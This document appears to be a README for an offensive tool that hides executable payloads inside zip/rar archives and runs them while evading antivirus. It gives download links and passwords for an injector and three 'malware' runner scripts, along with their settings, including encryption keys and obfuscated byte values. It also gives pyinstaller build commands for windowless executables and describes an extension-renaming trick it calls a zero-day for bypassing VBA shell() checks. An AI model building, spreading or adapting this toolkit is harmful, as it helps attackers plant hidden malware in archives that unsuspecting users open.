It embeds the executable file or payload inside the zip/rar file. It can use two different methods. The first method embeds the executable or payload in the zip/rar file without any action. In this way, it can be triggered and run by documents in the compressed file or in the same folder. The second method encrypts the executable file or payload and it also uses the "garbage code insertion/dead-code insertion" method to prevent the payload from being caught by the antivirus at runtime. Both methods do not damage the rar/zip file. It is not detected by users. However, the first method can be detected by the antivirus depending on the code embedded.

Method 0 [Mode 0]

  The Linux operating system decides whether the file can be run by looking at the first bytes. The same is true for Windows. However, as the Windows operating system evolved, it associated files with file extensions. But the internal functions still work by looking at the first bytes of the files. In this way, while files with extensions such as exe, dll do not normally work in many functions for security reasons, it is possible to run them only by changing or deleting the extensions.

  For example, it is possible to run the file from "cmd.exe" regardless of the file extension.

  Some attack methods can be made by taking advantage of the vulnerability of both the Windows operating system and the Winrar / Winzip / 7z (etc) program. Executable/payload in rar/zip/7zip (etc) can be triggered by a file inside the rar/zip/7zip (etc) or a file in the same folder. In order to be easy to trigger, the payload does not require any encryption. However, before adding malicious code to rar/zip/7zip (etc), the attacker must take additional precautions such as "UPx" in order not to be caught by the antivirus.

"It is a very simple attack file that uses this method as an example."

The VBA shell() function in Microsoft applications does not run files with malicious extensions such as exe, dll, and gives a virus warning. As an example of "ZERODAY ATTACK", these files can be run if their extensions are changed. Although there are dozens of similar vulnerabilities, one example is given below.

example1.rar --> zip password: !0*ziP*+*RAr*9?

Link = https://drive.google.com/file/d/167BmQSjKQcwTnlZSU--i7le3dup97JdV/view?usp=sharing

[a,b,c,d]

[a]

[b]

[c]

[d]

  It is a very simple but effective attack method.

Method 1 [Mode 1]

  This method encrypts the executable file or payload and it also uses the "garbage code insertion/dead-code insertion" method to prevent the payload from being caught by the antivirus at runtime. This method can be used both in the attack and after the attack to hide itself in a rar/zip file that exists in the system.

File(s)

 1) InjectingMalwareIntoZIPRAR.py : It is the script that embeds the payload into the zip/rar file.

 2) malware_v1.py : It is the script that extracts the malware in the existing zip/rar file by using "method 0" and runs it.

 3) malware_v2.py : It is the script that extracts the malware in the existing zip/rar file by using "method 1" and runs it. (After the script code is compiled, the values of the variables can be seen with the static analysis of the program.)

 4) malware_v3.py : It is the script that extracts the malware in the existing zip/rar file by using "method 1" and runs it. (After the script code is compiled, the values of the variables can be seen with dynamic analysis of the program.)

"Injecting Malware Into ZIP/RAR File"

InjectingMalwareIntoZIPRAR.rar --> zip password: !0*ziP*+*RAr*9?

Link = https://drive.google.com/file/d/1NWqwOCLKnxDvTxMCpMNbWxm9tiN0I4wL/view?usp=sharing

"Malware V1"

malware_v1.rar --> zip password: !0*ziP*+*RAr*9?

Link = https://drive.google.com/file/d/1NyJDfFU7bGau127oZ-M6S1Q1bDUXFk5E/view?usp=sharing

"Malware V2"

malware_v2.rar --> zip password: !0*ziP*+*RAr*9?

Link = https://drive.google.com/file/d/1SJc8QJ_92ABAwSkrRcLNz4IDRL8CdjxT/view?usp=sharing

"Malware V3"

malware_v3.rar --> zip password: !0*ziP*+*RAr*9?

Link = https://drive.google.com/file/d/1MOvk0IKdkPzlDKLdSsJWLpxkQtLpYlKL/view?usp=sharing

Required libraries: colorama, pyinstaller

pip install colorama
pip install pyinstaller

"pyinstaller" will be used to make the code one piece executable

InjectingMalwareIntoZIPRAR.py (Default Settings)

class SETTINGS():
    PROGRAM_NAME      = "Injecting Malware Into Winzip/Winrar" # Program Name
    RAR_or_ZIP_FILE   = 'document.zip'                         # Zip/rar file name  # The variable is changed again during the program run.
    EXE_FILE          = "malware.exe"	                         # Malware file name  # The variable is changed again during the program run.		 									
    OUT_FILE          = "malware"                              # Out file name = OUT_FILE + "RAR/ZIP" + ".zip/.rar"
    MODE              = 0                                      # A variable value of 0 means an unencrypted injection; A variable value of 1 means an encrypted injection.
    PUPLIC_KEY        = b'!AbdUlkadiR%+39608]gunGor[{'         # Encryption key
    PRIVATE_NUMBER    = 19                                     # Encryption number
    BUFFER            = 1024                                   # Buffer for memory optimization
    FILL_SIZE         = 1073741824                             # 1024x1024x1024 (1 GB)
    WAIT_TIME         = 0.1                                    # Waiting time between processes

malware_v1.py (Default Settings) [Mode 0]

class SETTINGS():
    FILE = "malwareZIP.zip" # It can also be given as a parameter to the program #(Example)>>malware_v1.exe "malwareZIP.zip"
    WAIT_TIME  = 0.1        # Waiting time between processes

malware_v2.py (Default Settings) [Mode 1]

class SETTINGS():
    RAR_or_ZIP_FILE   = "malwareZIP.zip"        # It can also be given as a parameter to the program #(Example)>>malware_v2.exe "malwareZIP.zip"
    OUT_FILE = "malware_test.exe"               # Out file name   
    PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{' # Encryption key
    PRIVATE_NUMBER = 19                         # Encryption number
    BUFFER     = 1024                           # Buffer for memory optimization   
    WAIT_TIME  = 0.1                            # Waiting time between processes

malware_v3.py (Default Settings) [Mode 1]

# Encrypted data for static analysis
# However, variables can be resolved with dynamic analysis.
class SETTINGS():
    ENTRY             = False
    KEY               = b"i*^2AcFeq19?8l&%r+Tm]|[ojB,TEx$.R"
    RAR_or_ZIP_FILE   = b'\x1cZ\x12L\x1f\x15\x1ao*/\x18<\x1bv' ###(Example) cmd>>malware_v2 "malwareZIP.zip"
    OUT_FILE = b'3(Z\x03UE$\x0eYf;)\x0b\r60'
    PUPLIC_KEY = b'geaP9\x0fA0x\x03y\x04>\nb\rBF2.\x1b\x0b/]7f\x11'
    PRIVATE_NUMBER = b'\x13x'
    BUFFER     = 1024
    WAIT_TIME  = 0.1

[Language : Python 3.8.5]

# [Program that produces zip/rar with malware]
pyinstaller --onefile --icon=InjectingMalwareIntoZIPRAR.ico InjectingMalwareIntoZIPRAR.py

# [Malware(s)]
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v1.py
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v2.py
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v3.py

Screenshot [1] (InjectingMalwareIntoZIPRAR.exe) [(Method 0)->Mode 0]

Screenshot [2] (InjectingMalwareIntoZIPRAR.exe) [(Method 1)->Mode 1]

Screenshot [3] (malware_v1.exe) [(Method 0)->Mode 0]

Triggering malware from cmd.exe

Screenshot [4] (malware_v1.exe) [(Method 0)->Mode 0]

Screenshot [5] (malware_v2.exe) [(Method 1)->Mode 1]

Screenshot [6] (malware_v2.exe) [(Method 1)->Mode 1]

Screenshot [7] (malware_v3.exe) [(Method 1)->Mode 1]

Screenshot [8] (malware_v3.exe) [(Method 1)->Mode 1]

  Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.